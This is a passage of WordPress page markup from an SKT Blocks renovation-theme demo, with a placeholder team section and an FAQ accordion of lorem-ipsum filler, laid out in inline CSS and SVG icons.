top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ae79a515-efc1-4d44-ab45-c0f72c41322c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-ae79a515-efc1-4d44-ab45-c0f72c41322c background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-ae79a515-efc1-4d44-ab45-c0f72c41322c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae79a515-efc1-4d44-ab45-c0f72c41322c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae79a515-efc1-4d44-ab45-c0f72c41322c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ae79a515-efc1-4d44-ab45-c0f72c41322c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae79a515-efc1-4d44-ab45-c0f72c41322c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7ff9289b-0fb5-4b4d-807f-f7ae10239b2c\"} -->\n<style type=\"text/css\"> .block-7ff9289b-0fb5-4b4d-807f-f7ae10239b2c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7ff9289b-0fb5-4b4d-807f-f7ae10239b2c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7ff9289b-0fb5-4b4d-807f-f7ae10239b2c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7ff9289b-0fb5-4b4d-807f-f7ae10239b2c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7ff9289b-0fb5-4b4d-807f-f7ae10239b2c .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7ff9289b-0fb5-4b4d-807f-f7ae10239b2c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7ff9289b-0fb5-4b4d-807f-f7ae10239b2c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7ff9289b-0fb5-4b4d-807f-f7ae10239b2c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"af2c3886-5f43-47f1-9142-5b45f3e5166f\"} -->\n<style type=\"text/css\"> .block-af2c3886-5f43-47f1-9142-5b45f3e5166f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-af2c3886-5f43-47f1-9142-5b45f3e5166f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-af2c3886-5f43-47f1-9142-5b45f3e5166f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-af2c3886-5f43-47f1-9142-5b45f3e5166f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-af2c3886-5f43-47f1-9142-5b45f3e5166f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-af2c3886-5f43-47f1-9142-5b45f3e5166f\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"adb2b5c1-3d08-4bed-aebc-4d2ad652d39f\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-adb2b5c1-3d08-4bed-aebc-4d2ad652d39f\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">FAQs</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Get every answer<br>from here</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":50} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"2f9363ee\",\"schema\":\"{u0022@contextu0022:u0022https://schema.orgu0022,u0022@typeu0022:u0022AccordionPageu0022,u0022mainEntityu0022:[{u0022@typeu0022:u0022Titleu0022,u0022nameu0022:u0022Real Estate Lawu0022,u0022acceptedContentu0022:{u0022@typeu0022:u0022Contentu0022,u0022textu0022:u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.u0022}},{u0022@typeu0022:u0022Titleu0022,u0022nameu0022:u0022The industry standardu0022,u0022acceptedContentu0022:{u0022@typeu0022:u0022Contentu0022,u0022textu0022:u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.u0022}},{u0022@typeu0022:u0022Titleu0022,u0022nameu0022:u0022Unknown printer galleyu0022,u0022acceptedContentu0022:{u0022@typeu0022:u0022Contentu0022,u0022textu0022:u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.u0022}},{u0022@typeu0022:u0022Titleu0022,u0022nameu0022:u0022Aldus PageMaker includingu0022,u0022acceptedContentu0022:{u0022@typeu0022:u0022Contentu0022,u0022textu0022:u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-2f9363ee skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-2f9363ee {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-2f9363ee .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2f9363ee .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2f9363ee .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-2f9363ee .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-2f9363ee .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"78ed597b\",\"title\":\"Real Estate Law\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-78ed597b gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewbox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewbox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Real Estate Law</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"44c1e40b\",\"title\":\"The industry standard\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-44c1e40b gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewbox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewbox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">The industry standard</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"49ed1e29\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-49ed1e29 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewbox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewbox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"1f890a06\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-1f890a06 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewbox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewbox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 